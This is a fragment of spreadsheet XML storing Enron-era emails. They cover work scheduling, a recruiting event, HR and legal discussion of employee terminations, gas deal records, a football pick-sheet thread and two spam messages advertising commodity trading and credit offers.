  </si>
  <si>
    <t>EES CA SCHEDULE for 2/1 and 2/2/02</t>
  </si>
  <si>
    <t>The attached schedule covers both Friday and Saturday, Feb 1-2.  Associated text files will be posted to Sparky today._x000D_
_x000D_
_x000D_
            _x000D_
_x000D_
_x000D_
_x000D_
Michael R. Frazier_x000D_
Manager_x000D_
Load Forecasting Desk_x000D_
Enron Energy Services_x000D_
Office: 713-345-3200_x000D_
Pager: 877-926-0615_x000D_
P-mail: 8779260615@skytel.com</t>
  </si>
  <si>
    <t>Fri, 15 Sep 2000 11:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tamara.hopkins@enron.com', 'james.scribner@enron.com', 'eric.moon@enron.com', 'mike.mcconnell@enron.com', 'angie.zeman@enron.com', 'patrick.maloy@enron.com', 'sally.beck@enron.com', 'nate.blackburn@enron.com', 'ronald.adzgery@enron.com'})</t>
  </si>
  <si>
    <t>OU Presentation 9/19/00</t>
  </si>
  <si>
    <t>Dear OU Team Members:_x000D_
_x000D_
This e-mail is to confirm your participation in our presentation on campus _x000D_
September 19.  If you will not need a hotel room, please let me know  ASAP, _x000D_
otherwise, please see your confirmation number below:_x000D_
_x000D_
Farifield Inn_x000D_
301Norman Center Court_x000D_
405/447-1661_x000D_
_x000D_
Checking in:   9/19_x000D_
Departure:   9/20  _x000D_
Confirmation Numbers:  84413435, 844133535 -- under my name _x000D_
Cancellation:  Done by 6pm 9/18_x000D_
_x000D_
The event is scheduled to begin Tuesday, September 19 at 6:00.  Please plan _x000D_
to arrive by 5:30.  Business casual attire.  _x000D_
_x000D_
The presentation will be held in Meacham Auditorium / Oklahoma Memorial Union._x000D_
_x000D_
Mike McConnell will be the presenter.  _x000D_
_x000D_
Snacks will be served prior to the presentation.  Afterwards, we will go to _x000D_
Coach's in order to spend additional time with the candidates._x000D_
_x000D_
If you are unfamiliar with the campus, please visit their web site at: _x000D_
http://www.ou.edu or give me a call._x000D_
_x000D_
_x000D_
** Don't forget to bring business cards!! **_x000D_
_x000D_
_x000D_
Please let me know if you have any questions.  On the day of the event, I can _x000D_
be reached on my cell phone: 281/793-1097_x000D_
_x000D_
Thank you for your help!_x000D_
_x000D_
Lexi Elliott_x000D_
3-4585</t>
  </si>
  <si>
    <t>Tue, 23 Oct 2001 12:25:56 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mollycoffin@hotmail.com'})</t>
  </si>
  <si>
    <t>frozenset({'nancy.sellers@robertmondavi.com', 'scottwl@hotmail.com'})</t>
  </si>
  <si>
    <t>RE: Pick Sheet - Week 8.xls</t>
  </si>
  <si>
    <t>Fine with me, but just to warn you...I'll feel obligated to do Sean's the quickest and with the least amount of brain activity._x000D_
_x000D_
_x000D_
_x000D_
&gt;From: Nancy Sellers _x000D_
&gt;To: 'Molly Coffin' , scottwl@hotmail.com, Nancy Sellers _x000D_
&gt;CC: skmaloney@yahoo.com, cameron@perfect.com, Jeff_Dasovich@enron.com, PSellers@pacbell.net _x000D_
&gt;Subject: RE: Pick Sheet - Week 8.xls _x000D_
&gt;Date: Tue, 23 Oct 2001 12:22:35 -0700 _x000D_
&gt; _x000D_
&gt;I say let's do it!!!!!!!!!!!!!!!!!!! _x000D_
&gt; _x000D_
&gt;-----Original Message----- _x000D_
&gt;From: Molly Coffin [mailto:mollycoffin@hotmail.com] _x000D_
&gt;Sent: Tuesday, October 23, 2001 12:18 PM _x000D_
&gt;To: scottwl@hotmail.com; Nancy.Sellers@RobertMondavi.com _x000D_
&gt;Cc: skmaloney@yahoo.com; cameron@perfect.com; Jeff_Dasovich@enron.com; _x000D_
&gt;PSellers@pacbell.net _x000D_
&gt;Subject: Re: Pick Sheet - Week 8.xls _x000D_
&gt; _x000D_
&gt; _x000D_
&gt; _x000D_
&gt;I could save you all a lot of time and effort by doing everyone's picks in a _x000D_
&gt;matter of about 2 minutes time...but there might be a small fee _x000D_
&gt;involved...(results may vary) _x000D_
&gt; _x000D_
&gt; _x000D_
&gt; _x000D_
&gt; &gt;From: "Scott Laughlin" _x000D_
&gt; &gt;To: Nancy.Sellers@RobertMondavi.com, mollycoffin@hotmail.com _x000D_
&gt; &gt;CC: skmaloney@yahoo.com, cameron@perfect.com, Jeff_Dasovich@enron.com, _x000D_
&gt;PSellers@pacbell.net _x000D_
&gt; &gt;Subject: Re: Pick Sheet - Week 8.xls _x000D_
&gt; &gt;Date: Tue, 23 Oct 2001 17:05:42 _x000D_
&gt; &gt; _x000D_
&gt; &gt;No, I want her picks! This is going to start a major bidding war... _x000D_
&gt; &gt; _x000D_
&gt; &gt; _x000D_
&gt; &gt;&gt;From: Nancy Sellers _x000D_
&gt; &gt;&gt;To: "'Molly Coffin (Hotmail)'" _x000D_
&gt; &gt;&gt;CC: 'Sean Maloney' , Cameron _x000D_
&gt; &gt;&gt;, Jeff Dasovich , _x000D_
&gt; &gt;&gt;"Prentice @ Berkeley" , Prentice _x000D_
&gt; &gt;&gt;Sellers , Scott Laughlin _x000D_
&gt; &gt;&gt; _x000D_
&gt; &gt;&gt;Subject: Pick Sheet - Week 8.xls _x000D_
&gt; &gt;&gt;Date: Tue, 23 Oct 2001 08:22:50 -0700 _x000D_
&gt; &gt;&gt; _x000D_
&gt; &gt;&gt; _x000D_
&gt; &gt;&gt; _x000D_
&gt; &gt;&gt; _x000D_
&gt; &gt;&gt; _x000D_
&gt; &gt;&gt; _x000D_
&gt; &gt;&gt; _x000D_
&gt; &gt;&gt;Molly, please fill out this sheet for me! _x000D_
&gt; &gt;&gt; _x000D_
&gt; &gt;&gt; &lt;&gt; _x000D_
&gt; &gt;&gt; _x000D_
&gt; &gt;&gt;&lt;&lt; PickSheet-Week8.xls &gt;&gt; _x000D_
&gt; &gt; _x000D_
&gt; _x000D_
&gt; _____ _x000D_
&gt; _x000D_
&gt;Get your FREE download of MSN Explorer at http://explorer.msn.com _x000D_
&gt; _x000D_
&gt; _x000D_
&gt; _x000D_
_x000D_
  _____  _x000D_
_x000D_
Get your FREE download of MSN Explorer at http://explorer.msn.com &lt;http://go.msn.com/bql/hmtag_itl_EN.asp&gt;</t>
  </si>
  <si>
    <t>Mon, 22 Oct 2001 15:10:51 -0700 (PDT)</t>
  </si>
  <si>
    <t>Sick Leave Procedure</t>
  </si>
  <si>
    <t>SICK LEAVE POLICY _x000D_
_x000D_
Policy_x000D_
_x000D_
To keep the business and each department running smoothly and efficiently, it is important that every employee be on the job on time regularly.  For this reason, careful attention is given to promptness, absence record and overall dependability._x000D_
_x000D_
Enron recognizes, however, that an employee may occasionally be unable to come to work due to injury or illness.  As a result, the Sick Leave policy is designed to provide protection to employees against loss of income during pregnancy, illness or injury._x000D_
_x000D_
Eligible employees who are unable to perform their jobs due to pregnancy, illness or injury are eligible to receive sick leave pay for up to 1,040 hours (6 months) in a twelve month period, assuming certain procedures are followed.    Effective January 1, 2002, the Family Medical Leave Act (FMLA) runs concurrently with Enron's Sick Leave policy.  An employee who is still disabled after using the 1,040 hours of sick leave pay ends may qualify for long term disability insurance.  Sick days cannot be carried over from one calendar year to the next and employees are not paid for sick days either at the end of the calendar year or upon termination.  _x000D_
_x000D_
Proposed Policy Link_x000D_
_x000D_
Procedures -_x000D_
_x000D_
To be eligible for sick leave pay, employees unable to report to work must telephone their supervisor directly, each day of their absence, as far in advance as possible.  If their supervisor is not available, the employee's human resources representative should be contacted.  If an employee is unable to make the call personally, a family member or a friend should contact the supervisor.  The supervisor or human resources representative must be contacted each day of absence.  An employee who fails to contact his/her immediate supervisor or human resources representative may forfeit the sick leave pay and may be considered as having voluntarily resigned.  This policy must be followed unless an exception has been made for a particular absence, and a written memo to this effect has been sent to the employees' human resources representative._x000D_
_x000D_
On the fifth day of continued absence due to injury or illness, in addition to notifying the employee's supervisor or human resources representative, the employee must also attain a doctor's certification indicating the estimated date in which the employee will be able to return to work.  Any absences exceeding 2 weeks will require a doctor's certification indicating that the employee is able to return to work.</t>
  </si>
  <si>
    <t>Fri, 28 Jul 2000 05:01:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'hoyt.thomas@enron.com'})</t>
  </si>
  <si>
    <t>Re: Confidential</t>
  </si>
  <si>
    <t xml:space="preserve">I will look closely at the sample letters to see whether there is any way to _x000D_
avoid the conclusion you have reached, which appears to be the correct one.  _x000D_
I have a meeting right now, and will focus on it right after that -- I'll _x000D_
send another email once I've completed that review early this afternoon.  _x000D_
Michelle_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Hoyt Thomas@ENRON_x000D_
07/28/2000 11:23 AM_x000D_
To: Michelle Cash/HOU/ECT@ECT_x000D_
cc: Jon Chapman/LON/ECT@ECT, David Oxley/HOU/ECT@ECT _x000D_
Subject: Confidential  _x000D_
_x000D_
Michelle, Melissa Laing and I talked to Jon Chapman today, and basically Jon _x000D_
deferred to you, since the RW employees in NY are a question for US _x000D_
employment law._x000D_
_x000D_
Melissa and I do believe that the  RW US-based employees that were given _x000D_
UK-style employment letters, such as the sample one I gave you, are our _x000D_
employees, because of those letters; they were given "offer letters" by MG _x000D_
before the MG/Enron deal went unconditional and in most cases they accepted _x000D_
them, so they were MG employees when all MG employees became our employees.  _x000D_
If it is a fact that they are Enron employees, we have to figure out the _x000D_
liability associated with terminating them!  _x000D_
_x000D_
It appears that on Monday, MG and Enron leadership will decide to exit some _x000D_
of the London and New York RW business that MG acquired, and some (minimum 9, _x000D_
max 15) of the former RW employees will need to be terminated during _x000D_
August.   John Sheriff and Gary Hickerson both want to know the cost of that _x000D_
decision.   Right now we are assuming that we are liable for the severance _x000D_
periods stated in the offer letters to the people; we would like to be able _x000D_
to avoid that cost  (estimated at $700k and $1.5M, depending on who is _x000D_
redundant) or reduce it if possible.  However, if it is your recommendation _x000D_
that we have to honor those letters, so be it._x000D_
_x000D_
If you have any questions, please call Melissa Laing (tie line 8303 6617) in _x000D_
the UK and she can find me.  Thanks._x000D_
_x000D_
Hoyt_x000D_
_x000D_
_x000D_
_x000D_
Michelle Cash@ECT_x000D_
07/28/2000 10:10 AM_x000D_
To: Hoyt Thomas/NA/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: RW  _x000D_
_x000D_
Hoyt, I am convinced that the MG employees are ours.  The RW employees may or _x000D_
may not be ours.  It is my understanding that we own the assets of RW, and _x000D_
that we decided to hire certain, key personnel from RW.  The remaining RW _x000D_
employees do not automatically come with the assets.  I am working on _x000D_
obtaining more information on the RW side of things from lawyers here in the _x000D_
US.  Key to employment decisions will be provisions of the asset purchase _x000D_
agreement, if any are applicable.  You might check with Jon Chapman in the UK _x000D_
to see whether he has any more information on this point.  Thanks.  Michelle_x000D_
_x000D_
_x000D_
_x000D_
Hoyt Thomas@ENRON_x000D_
07/28/2000 04:12 AM_x000D_
To: Michelle Cash/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: RW_x000D_
_x000D_
_x000D_
	_x000D_
_x000D_
Justin Boyd said he talked to you, are you convinced that the MG and RW _x000D_
employees are now ours?_x000D_
_x000D_
Assuming that you do:_x000D_
_x000D_
I will bring copies of all the offer letters MG wrote to RW employees, I _x000D_
think there are something like 27 or 28.  They are all very similar to the _x000D_
one or two that I have already given you._x000D_
_x000D_
I believe that we will not want to keep some of the businesses that are being _x000D_
acquired with Rudolph Wolff, particularly the FX business in New York.  _x000D_
Naturally, some of the people in the potentially discontinued business _x000D_
received the onerous letters.  Gary Hickerson has to decide what he is going _x000D_
to do with this by August 18, if not sooner.  With the letters that were _x000D_
delivered , I would like to get an opinion from you on what we have to do to _x000D_
terminate the people associated with the business, assuming that Gary wants _x000D_
to shut it down._x000D_
_x000D_
Also, MG have 4 to 6 employees in Montreal.  We (HR) are trying to convince _x000D_
the business side that we do not want any people in Montreal because of the _x000D_
employment laws . . . but it does not appear that we will succeed.  We may _x000D_
reduce the size of the office, though, and we may not want to put them on the _x000D_
Canadian payroll, particularly is we only keep 1-2 people there.  Do you have _x000D_
contacts in Montreal that can advise us on how to terminate any employees _x000D_
that we choose to terminate?  What would be the Enron position on having them _x000D_
on a separate payroll from Enron Canada?_x000D_
_x000D_
Thanks_x000D_
Hoyt_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 21 Aug 2000 01:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Change Order #2 to LM6000 Purchase Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Mike,_x000D_
_x000D_
In a meeting Friday afternoon with Ben Jacoby, he mentioned that he didnt _x000D_
want the change order signed quite yet. I suspect he wants to review it _x000D_
before it is signed, and he's on vacation this week._x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 08/21/2000 08:38 _x000D_
AM ---------------------------_x000D_
From: Kathleen Clark@ENRON_DEVELOPMENT on 08/21/2000 08:20 AM_x000D_
To: Mike Miller/NA/Enron@Enron_x000D_
cc: Kay Mann/Corp/Enron@ENRON, David Marshall/HOU/ECT@ECT _x000D_
_x000D_
Subject: Change Order #2 to LM6000 Purchase Agreement_x000D_
_x000D_
Mike,_x000D_
_x000D_
Attached for your review and signature is Change Order No. 2 to the LM6000 _x000D_
Purchase Agreement.  I am forwarding it to Kay and David for their approval _x000D_
for you._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Regards._x000D_
Kathy Clark_x000D_
x56400_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 28 Sep 2000 10:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>ExxonMobil v. EGP, et al.</t>
  </si>
  <si>
    <t xml:space="preserve">I need this printed out on my stationary ASAP fri morning. Thanks_x000D_
----- Forwarded by Richard B Sanders/HOU/ECT on 09/28/2000 05:48 PM -----_x000D_
_x000D_
	Britt Davis@ENRON_x000D_
	09/28/2000 12:10 PM_x000D_
		 _x000D_
		 To: Jim Armogida/Corp/Enron@ENRON, Michael Moran/ET&amp;S/Enron@ENRON, Richard B _x000D_
Sanders/HOU/ECT@ECT_x000D_
		 cc: Robert Vote/Corp/Enron@ENRON, Rockey Storie/ET&amp;S/Enron@ENRON, Becky _x000D_
Zikes/Corp/Enron@ENRON_x000D_
		 Subject: ExxonMobil v. EGP, et al. _x000D_
_x000D_
Gentlemen:_x000D_
_x000D_
As I mentioned in my earlier e-mail of this morning, I attach the latest _x000D_
versions of the letter to ExxonMobil and the chronology.  Again, I have _x000D_
deliberately softened the tone in the last paragraph of page 2 of the letter _x000D_
to wire around a potential problem caused by a 1995 letter from us to Mobil _x000D_
in the past about the role of ELSC.  We have also redrafted both the letter _x000D_
and chronology to reflect that the ELP, LP was a publicly traded company, so _x000D_
KN acquired only Enron's interest in it, not all of it.  We last redrafted _x000D_
the chronology to reflect that the partnership never actually owned the _x000D_
hydrocarbon recovery plant._x000D_
_x000D_
Mike has briefly reviewed these drafts and I understand has no problem with _x000D_
them (although I am resending them to him for him to review again if he _x000D_
wishes).  _x000D_
_x000D_
Jim and Richard, once I have your respective comments/go ahead, I will send _x000D_
this to Eric Nichols by telefax this afternoon.  I will also give Nichols a _x000D_
heads-up that it is coming._x000D_
_x000D_
I await your response._x000D_
_x000D_
Britt_x000D_
_x000D_
  _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 17 Nov 2000 08:25:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'cheryl.gaines@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'cutty.cunningham@enron.com', 'michel.nelson@enron.com', 'earl.chanley@enron.com', 'rick.craig@enron.com', 'deaun.trayer@enron.com', 'lori.maddox@enron.com', 'norm.spalding@enron.com', 'rick.johnson@enron.com', 'don.bruce@enron.com', 'nick.rahn@enron.com', 'roger.sumlin@enron.com', 'barney.brasher@enron.com', 'mary.coombe@enron.com', 'terry.galassini@enron.com', 'greg.mathews@enron.com', 'ronny.davenport@enron.com', 'john.shafer@enron.com', 'larry.fenstad@enron.com', 'phil.lowry@enron.com', 'morris.brassfield@enron.com', 'jon.trevelise@enron.com', 'warren.schick@enron.com', 'jerry.martin@enron.com', 'mark.adelmann@enron.com', 'don.hawkins@enron.com', 'stanley.horton@enron.com', 'larry.steward@enron.com', 'joe.richards@enron.com', 'talbert.loyd@enron.com', 'louis.soldano@enron.com', 'dan.pribble@enron.com', 'lawrence.clayton@enron.com', 'tracy.geaccone@enron.com', 'molly.sample@enron.com', 'john.keller@enron.com', 'michael.moran@enron.com', 'mike.smith@enron.com', 'susan.ralph@enron.com', 'dana.gibbs@enron.com', 'william.kendrick@enron.com', 'cheryl.gaines@enron.com', 'wilson.barbee@enron.com', 'randy.rice@enron.com', 'randy.belyeu@enron.com', 'rod.hayslett@enron.com', 'david.clements@enron.com', 'david.johnson@enron.com', 'robin.border@enron.com', 'frank.osburn@enron.com', 'stephen.allen@enron.com', 'dave.odneal@enron.com', 'david.hultsman@enron.com'})</t>
  </si>
  <si>
    <t>EOTT/ETS Consolidation Activity Schedule</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is this week's EOTT/ETS Consolidation Activity Schedule.  Please _x000D_
send any revisions to me._x000D_
_x000D_
_x000D_
_x000D_
Thanks!_x000D_
Cheryl_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 27 Jun 2000 04:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ami_chokshi@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Ami,,,_x000D_
per our conversation, I would perfer the 2,000 difference be placed on the OBA_x000D_
between LSP and Teco,_x000D_
_x000D_
because we requested to cut the flow._x000D_
Thanks!!_x000D_
---------------------- Forwarded by Tim Powell/LSP/ENSERCH/US on 06/27/2000_x000D_
10:58 AM ---------------------------_x000D_
_x000D_
_x000D_
Ami.Chokshi@enron.com on 06/27/2000 08:42:09 AM_x000D_
_x000D_
To:   Tim Powell/LSP/ENSERCH/US@TU_x000D_
cc:   Charlie Stone/Texas Utilities@TU, Daren.J.Farmer@enron.com_x000D_
Subject:_x000D_
_x000D_
_x000D_
_x000D_
Hey Tim,_x000D_
_x000D_
For May 12, our supply shows that 8.000 did flow even though you cut flow_x000D_
to 6.0.  Let me know how you want to handle the situation. Sorry for the_x000D_
inconvenience._x000D_
_x000D_
Ami_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 7 Jun 2000 11:38:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>April Physical Liquidations</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Phillip M Love/HOU/ECT on 06/07/2000 _x000D_
06:35 PM ---------------------------_x000D_
_x000D_
_x000D_
Jim Little_x000D_
05/03/2000 09:24 AM_x000D_
To: Troy Klussmann/HOU/ECT@ECT, Cynthia Hakemack/HOU/ECT@ECT, Diane H _x000D_
Cook/HOU/ECT@ECT, Mark Friedman/HOU/ECT@ECT, Mechelle Stevens/HOU/ECT@ECT, _x000D_
Cathy De La Torre/HOU/ECT@ECT, Phillip M Love/HOU/ECT@ECT, Melba A _x000D_
Bowen/HOU/ECT@ECT, Mary Theresa Franklin/HOU/ECT@ECT, Wade R _x000D_
Price/HOU/ECT@ECT, David Oliver/HOU/ECT@ECT, Carrie Hollomon/HOU/ECT@ECT, _x000D_
Janie Gallegos/HOU/ECT@ECT, Gregory A Mausser/HOU/ECT@ECT, Bryan _x000D_
Hull/HOU/ECT@ECT, Dawn C Kenne/HOU/ECT@ECT, Elizabeth L _x000D_
Hernandez/HOU/ECT@ECT, Cathy Sprowls/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: April Physical Liquidations_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 23 May 2001 09:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'claravelez@mail.ee'})</t>
  </si>
  <si>
    <t>frozenset({'bceverhart@gomail.com.ua'})</t>
  </si>
  <si>
    <t>The 2001 Energy Crisis Is Here                         7710</t>
  </si>
  <si>
    <t>FREE DOW JONES INVESTMENT VIDEO! Plus,_x000D_
Fill YOUR Bank Account with our $420 Offer!_x000D_
_x000D_
Build the future you want, with the index you can trust!_x000D_
Are you looking to protect yourself from a market correction_x000D_
or to protect your overall portfolio? Invest in something people_x000D_
USE everyday and will continue to use everyday...COMMODITIES._x000D_
_x000D_
Don't just invest in stocks, diversify your portfolio with futures_x000D_
and futures options and accomplish your investment objectives!_x000D_
There has never been a better time, and the correct information_x000D_
has never been more readily available!  Just look at the rise in_x000D_
oil and and gas prices recently! Not to mention the information_x000D_
available via the internet._x000D_
_x000D_
People were making money with commodities long before the internet_x000D_
was even invented!  This an inexpensive alternative to "just stock"_x000D_
ownership that can improve your overall portfolio by participating_x000D_
in a broader worldwide market._x000D_
_x000D_
Can you imagine, for just one day, how people would react_x000D_
if they thought could not have their first cup of coffee or_x000D_
even some orange juice in the morning? What would happen to prices?_x000D_
_x000D_
Do you watch the news and pay attention the signs around you?_x000D_
At just a hint of a cold front, heating oil prices jump._x000D_
With just a hint of a frost in Florida or California,_x000D_
orange prices jump. With just a hint of a hurricane heading_x000D_
our way, plywood prices jump. Every year as vacation season_x000D_
begins, gasoline prices jump._x000D_
_x000D_
This is the world of supply and demand...BUY LOW and SELL HIGH!_x000D_
Do you remember when sugar prices shot up to $5 a pound?_x000D_
A lot of early investors in sugar made absolute fortunes!_x000D_
_x000D_
Commodities are used by people in literally every country_x000D_
in the world. Such things as gasoline, heating oil, coffee,_x000D_
sugar, corn, wheat, soybeans, apples, oranges, fish, beef,_x000D_
and pork, are some of the more well known. You've probably_x000D_
even heard of the infamous pork bellies! Let us show you_x000D_
how you can participate and profit in this lucrative market_x000D_
in the the new millenium!_x000D_
_x000D_
Examples:_x000D_
1) Due to oversupplies, combined the current lack of Asian demand,_x000D_
the prices of corn wheat, and soybeans are at their LOWEST prices_x000D_
in 20 years!  However, with a significant drought in some major grain_x000D_
growing areas and early signs of economic recovery in Asia, grain_x000D_
prices could increase substantailly soon. Learn how to speculate in_x000D_
the grain markets by leveraging 25,000 bushels of corn,_x000D_
wheat, or soybeans!_x000D_
_x000D_
2) You can also profit NOW from today's high gas prices!_x000D_
On a $5000 investment you can control over 420,000 gallons_x000D_
of gasoline by using options. Just a 5 cent movement in your favor_x000D_
means thousands of dollars of profit for you!_x000D_
_x000D_
"Oil, a century old commodity, is behaving like an upstart_x000D_
internet company."  Wall Street Journal, April 2000_x000D_
_x000D_
We are a small independent USA firm that really caters to our clients._x000D_
We have 25 years of experience and our results are second to none._x000D_
Learn how our clients get the best results and receive the most_x000D_
professional care in the investment world today._x000D_
_x000D_
Complete The Form Below, And We Will Send You..._x000D_
*One FREE Trade to get you started in the Oil market_x000D_
*Our FREE Video showing you how to trade successfully_x000D_
*A FREE Report detailing the Oil market and its major influences_x000D_
*The latest information on the most profitable market trends_x000D_
*FREE CONSULTATION using annotated charts and graphs_x000D_
showing the latest market movements_x000D_
*Our FREE book which answers the most frequently asked questions_x000D_
about the oil commodities market_x000D_
*A FREE Subscription to our exclusive newsletter_x000D_
..all this valued at over $420!_x000D_
_x000D_
Just "copy" the requested info below, "click" on the_x000D_
email setup link below, "paste" and then type in your_x000D_
info next to each field and_x000D_
mailto:cmdtyprfts35@yahoo.com?subject=FreeDowVideoandOilOffer_x000D_
_x000D_
Complete NAME_x000D_
ADDRESS_x000D_
CITY_x000D_
STATE_x000D_
ZIP CODE_x000D_
PHONE NUMBER_x000D_
BEST TIME TO CALL_x000D_
E-MAIL ADDRESS_x000D_
_x000D_
mailto:cmdtyprfts35@yahoo.com?subject=FreeDowVideoandOilOffer_x000D_
_x000D_
**The Information submitted is treated as strictly confidential_x000D_
and will be used for program package verification only._x000D_
_x000D_
*There is a significant risk of loss in all commodity trading._x000D_
Only risk capital should be used. Carefully consider your_x000D_
financial position before trading. Must Be 21 years old._x000D_
_x000D_
_x000D_
(REMOVAL INSTRUCTIONS)_x000D_
This mailing is done by an independent marketing company._x000D_
Please do not use the reply to this e-mail, an e-mail_x000D_
reply cannot be read!  If you would like to be removed from_x000D_
our mailing list, just click below and send us a remove_x000D_
request email._x000D_
mailto:rightonout@soon.com?subject=RemoveOilVideoPromo</t>
  </si>
  <si>
    <t>Fri, 5 Jan 2001 01:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mcampbell@hdinc.com'})</t>
  </si>
  <si>
    <t>Re: Status Report</t>
  </si>
  <si>
    <t xml:space="preserve">I have a standing staff meeting that I attend on Monday mornings, so I will _x000D_
not be available when you and James meet on the 8th.  I will look forward to _x000D_
getting with James after your meeting for an update.  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mike Campbell &lt;MCampbell@HDINC.COM&gt; on 01/03/2001 02:50:49 PM_x000D_
To: "'sally.beck@enron.com'" &lt;sally.beck@enron.com&gt;_x000D_
cc:  _x000D_
Subject: Status Report_x000D_
_x000D_
_x000D_
Sally,_x000D_
Just wanted to give you a quick status report on where we are to date. We_x000D_
have had two meetings postponed with James, but we are scheduled to meet_x000D_
again on Monday, January 8th at 9 AM. We will review and revise the written_x000D_
description our approach and James wants to share that with you after the_x000D_
meeting. If you are available on Monday, your input would expedite the_x000D_
review and revision process tremendously._x000D_
Thanks,_x000D_
_x000D_
Mike Campbell_x000D_
Holland &amp; Davis, Inc_x000D_
mcampbell@hdinc.com_x000D_
713-877-8130_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Mar 2001 08:39:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'daren.farmer@enron.com', 'edward.terry@enron.com', 'julie.meyers@enron.com', "o'neal.winfree@enron.com"})</t>
  </si>
  <si>
    <t>Spot Deals - April, 2001</t>
  </si>
  <si>
    <t>The following have been entered as spot deals for April, 2001:_x000D_
_x000D_
Deal #  Counterparty Meter #  Trade Zone Volume_x000D_
_x000D_
689849  Amerada Hess 0435  09  2,714_x000D_
689850  Anadarko 0435  09  1,104_x000D_
689851  Apache Corp 0435  09  1,326_x000D_
689893  Barrett Res 0435  09  1,536_x000D_
690252  Stone Energy 9696  06  4,030_x000D_
691156  Cima Energy 6284  05  361_x000D_
689894  Crosstex 0435  09  656_x000D_
691773  Crosstex 6519  05  1_x000D_
691813  Crosstex 9843  05  106_x000D_
692651  Comstock 9878  08  500_x000D_
691873  Duke Energy 6347  21  144_x000D_
691982  Embassy 6598  22  1_x000D_
692011  El Paso Mer 5848  05  203_x000D_
692026  El Paso Mer 5923  05  622_x000D_
688602  Four Square 9705  08  776_x000D_
692207  Helmerich &amp; P 9841  06  6,500_x000D_
692215  HESCO  9876  05  85_x000D_
692246  Hurd Ent 5427  18  4_x000D_
689896  Ocean En 0435  09  3,607_x000D_
689508  Phillips  6782  06  4,013_x000D_
692461  Ranger Oil 9871  09  147_x000D_
689898  Seneca Res 0435  09  3,073_x000D_
692844  Houston Ex 9696  06  5,000_x000D_
689814  Pure Res 9685  05  139_x000D_
689905  Tri-Union 0435  09  149_x000D_
692898  Whiting Petr 6523  12  113_x000D_
_x000D_
Bob</t>
  </si>
  <si>
    <t>Wed, 25 Oct 2000 02:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tana.jones@enron.com', 'brent.hendry@enron.com', 'samantha.boyd@enron.com', 'stephanie.panus@enron.com', 'mary.cook@enron.com', 'susan.bailey@enron.com'})</t>
  </si>
  <si>
    <t>Items being handled by Jason Peters</t>
  </si>
  <si>
    <t xml:space="preserve">All:  Please let me know if something is missing from the attached list.  _x000D_
Thanks.  Sara_x000D_
</t>
  </si>
  <si>
    <t>Mon, 7 Aug 2000 08:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kevin.howard@enron.com'})</t>
  </si>
  <si>
    <t>Re: Contract Approval Form and Internal Dashes Forms</t>
  </si>
  <si>
    <t>Kevin,_x000D_
_x000D_
A quick question before our meeting.  Didn't we have a little different form _x000D_
that you used at HPL?  I thought I remembered a little different version of _x000D_
the Contract Approval Sheet.  One that had more detail and description of the _x000D_
risks._x000D_
_x000D_
Thanks,_x000D_
Mike</t>
  </si>
  <si>
    <t>Mon, 20 Nov 2000 21:39:00 -0800 (PST)</t>
  </si>
  <si>
    <t>An invitation for you!</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
ANGELA BARNETT would like you to see this Web page:_x000D_
_x000D_
A Few Reasons to be Thankful_x000D_
(By Funny Greetings)_x000D_
_x000D_
Click below to see this page and to join the Funny Greetings mailing list:_x000D_
http://www.flowgo.com/rsubf.cfm?id=efxbzDggorvtwmqStzecyPlgt&amp;s=21&amp;p=2349&amp;d=11-_x000D_
21-00_x000D_
_x000D_
To just visit the recommended page, click here:_x000D_
http://www.flowgo.com/refer/redir.cfm?page_id=2349&amp;d=11-21-00_x000D_
_x000D_
_x000D_
================================================_x000D_
_x000D_
NO Cost Evaluation!  No Credit Checks!  Pre-qualify Online Instantly!  Click _x000D_
here to see how many credit cards you qualify for!_x000D_
http://www.flowgo.com/credit2.cfm_x000D_
&lt;A HREF="http://www.flowgo.com/credit2.cfm"&gt;AOL LINK&lt;/A&gt;_x000D_
_x000D_
_x000D_
================================================_x000D_
_x000D_
The flowgo.com mail referral system is meant to be used exclusively as a way _x000D_
to forward preferred pages to friends._x000D_
_x000D_
One of your friends sent this email through our website._x000D_
Friend's name: ANGELA BARNETT_x000D_
Friend's IP address: 192.152.140.9_x000D_
Date and Time: 11/21/00 3:38:41 AM Pacific_x000D_
_x000D_
If you feel this email was sent to you in error, or you do not know the _x000D_
friend you are receiving emails from, please notify us at:_x000D_
_x000D_
